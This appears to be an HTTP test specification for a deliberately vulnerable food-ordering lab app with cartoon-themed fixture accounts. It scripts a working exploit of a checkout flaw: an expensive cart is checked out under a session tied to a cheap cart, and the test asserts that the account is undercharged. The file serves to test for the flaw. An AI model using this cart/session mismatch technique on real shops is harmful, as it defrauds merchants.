# @import ../helpers.http
# @import ../common.http
# @import ./_reset.http
@base = {{base_host}}/v302
# @tag spec,v302,cart

### Menu lookup for cheap/expensive items by restaurant
# @ref seed_balance_v302
# @noCookieJar
GET {{base}}/menu

{{
  const body = helpers.parseBody(response) || [];
  const krustyItems = (body || []).filter((i) => i.restaurant_id === 1 || i.restaurantId === 1);
  const chumItems = (body || []).filter((i) => i.restaurant_id === 2 || i.restaurantId === 2);
  const cheap = krustyItems.sort((a,b)=>parseFloat(a.price||0)-parseFloat(b.price||0))[0];
  const pricey = chumItems.sort((a,b)=>parseFloat(b.price||0)-parseFloat(a.price||0))[0];
  if (!cheap || !pricey) throw new Error("Could not derive menu items for exploit");
  client.global.set("v302_cheap_id", cheap.id || cheap.item_id);
  client.global.set("v302_pricey_id", pricey.id || pricey.item_id);
}}

### Login to establish session for cheap cart
# @name v302_session_login
# @noCookieJar
POST {{base}}/auth/login
Content-Type: application/json

{
  "email": "plankton@chum-bucket.sea",
  "password": "i_love_my_wife"
}

?? js response.statusCode == 200

> {%
helpers.captureCookie(response, "v302_session_cookie");
%}

### Create CHEAP cart using session cookie (keeps session.cart_id)
# @name v302_cheap_cart
# @ref v302_session_login
# @noCookieJar
POST {{base}}/cart
Cookie: {{v302_session_cookie}}
Content-Type: application/x-www-form-urlencoded

restaurant_id=1

?? js response.statusCode == 201
?? js !!(response.parsedBody || response.body || {}).id

> {%
const cheapCart = helpers.parseBody(response);
client.global.set("v302_cheap_cart_id", cheapCart.id || cheapCart.cart_id);
%}

### Add cheap item to session cart
# @ref v302_cheap_cart
# @noCookieJar
POST {{base}}/cart/{{v302_cheap_cart_id}}/items
Cookie: {{v302_session_cookie}}
Content-Type: application/x-www-form-urlencoded

item_id={{v302_cheap_id}}

?? js response.statusCode == 200

### Create EXPENSIVE cart without session cookie (separate context)
# @name v302_expensive_cart
# @noCookieJar
POST {{base}}/cart
Authorization: {{plankton_auth}}
Content-Type: application/x-www-form-urlencoded

restaurant_id=2

?? js response.statusCode == 201

> {%
const priceyCart = helpers.parseBody(response);
client.global.set("v302_pricey_cart_id", priceyCart.id || priceyCart.cart_id);
%}

### Add pricey item to expensive cart (still no session cookie)
# @ref v302_expensive_cart
# @noCookieJar
POST {{base}}/cart/{{v302_pricey_cart_id}}/items
Authorization: {{plankton_auth}}
Content-Type: application/x-www-form-urlencoded

item_id={{v302_pricey_id}}

?? js response.statusCode == 200

### Baseline balance before checkout (session)
# @name v302_balance_before
# @ref v302_session_login
# @noCookieJar
GET {{base}}/account/credits
Cookie: {{v302_session_cookie}}

?? js response.statusCode == 200

> {%
const bal = parseFloat((helpers.parseBody(response).balance) || 0);
client.global.set("v302_balance_before", bal);
%}

### Vulnerability: Checkout expensive cart charges cheap session cart
# @ref v302_session_login
# @noCookieJar
POST {{base}}/cart/{{v302_pricey_cart_id}}/checkout
Cookie: {{v302_session_cookie}}
Content-Type: application/x-www-form-urlencoded

delivery_address=Spec%20Street&tip=0

> {%
client.test("v302 checkout succeeds", () => {
  const status = response.statusCode ?? response.status;
  if (status !== 201) throw new Error(`Expected 201, got ${status}`);
});
const order = helpers.parseBody(response);
client.global.set("v302_order_total", parseFloat(order.total || 0));
%}

### Balance should have dropped only by cheap cart total (vulnerability)
# @ref v302_session_login
# @noCookieJar
GET {{base}}/account/credits
Cookie: {{v302_session_cookie}}

> {%
const before = client.global.get("v302_balance_before");
const after = parseFloat((helpers.parseBody(response).balance) || 0);
const charged = before - after;
const orderTotal = client.global.get("v302_order_total");
if (!(charged < orderTotal)) {
  throw new Error(`Expected undercharge (charged ${charged}, order ${orderTotal})`);
}
%}
